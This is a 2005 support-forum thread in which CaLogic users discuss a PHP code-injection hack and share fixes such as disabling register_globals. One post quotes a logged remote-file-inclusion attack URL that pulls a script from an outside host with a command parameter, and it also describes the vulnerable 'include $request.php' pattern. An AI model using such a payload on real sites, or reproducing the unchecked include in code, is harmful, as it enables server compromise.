CaLogic Support Site Forum Index CaLogic usage & bug reports
Code injection security issue? Site hacked! | Register To Post |
| Threaded | Oldest First | Previous Topic | Next Topic | Bottom |
| Poster | Thread |
|---|---|
| Philip | Posted on: 2005/10/5 11:28 |
Webmaster ![]() ![]() Joined: 2002/10/15 From: Köln Germany Posts: 778 |
Re: Solution I have replied to your mail Mitch... hope the issue is resolved
Philip
|
| n2rga | Posted on: 2005/10/3 20:32 |
Just can't stay away ![]() ![]() Joined: 2004/5/17 From: Brooklyn, NY Posts: 17 |
Re: Solution Quote:
Please reply to the e-mail i have sent you. about this
|
| Philip | Posted on: 2005/8/29 10:46 |
Webmaster ![]() ![]() Joined: 2002/10/15 From: Köln Germany Posts: 778 |
Re: Solution Hi,
as far as I know, CaLogic has no more security / code injection errors. If you find any, please let me know. before the hackers do.. thanks Philip
|
| Anonymous | Posted on: 2005/7/28 23:17 |
|
Re: Solution My server had php script like this:
www.mydomain.com/index.php?request=abc and abc was phph scrpt that was included like this: ======= include header.php include $request.php include footer.php ======== From my web logs, my site was called like: www.mydomain.com/index.php?request=http://f58.aaa.livedoor.jp/~picapau/tool25.dat?&cmd=w where the funny japanese site has the php script that did all the damage. I am busy rewriting the index.php. Hope it helps. |
|
| Philip | Posted on: 2005/7/25 17:08 |
Webmaster ![]() ![]() Joined: 2002/10/15 From: Köln Germany Posts: 778 |
Re: Solution Thanks to everyone for all the tipps, help, and above all patience in this matter.
Philip
|
| Anonymous | Posted on: 2005/7/20 16:27 |
|
Re: Solution Hi,
i tried Franks great tip, but my provider won't let me set php_flags in .htaccess files. But they allowed to me to use a php.ini file only containing only the line register_globals=off CAUTION! Unline .htacess the php.ini does NOT work recursively and has to be copied to EVERY directory that should be protected. Have fun Andy |
|
| Anonymous | Posted on: 2005/7/20 14:46 |
|
Re: Solution Under Apache one can disable register_globals
in an .htaccess file per directory with the statement php_flag register_globals off But I'm not sure whether commercial providers leave this opportunity to their clients. Frank |
|
| Philip | Posted on: 2005/7/20 0:53 |
Webmaster ![]() ![]() Joined: 2002/10/15 From: Köln Germany Posts: 778 |
Re: Solution Thanks
|
| Anonymous | Posted on: 2005/7/19 23:08 |
|
Re: Solution ok, please forgive, it's doing an include after that and the include is the problem we know
calogic is still the best calendar ever seen. anyway i will take my time to let this settle |
|
| Anonymous | Posted on: 2005/7/19 22:55 |
|
Re: Solution nobody's perfect
what about the isset() instructions? i read that they could be misused too, if the parameters are not checked. like described here? http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/ |
|
| (1) 2 3 » | |
| Threaded | Oldest First | Previous Topic | Next Topic | |
| Register To Post | |







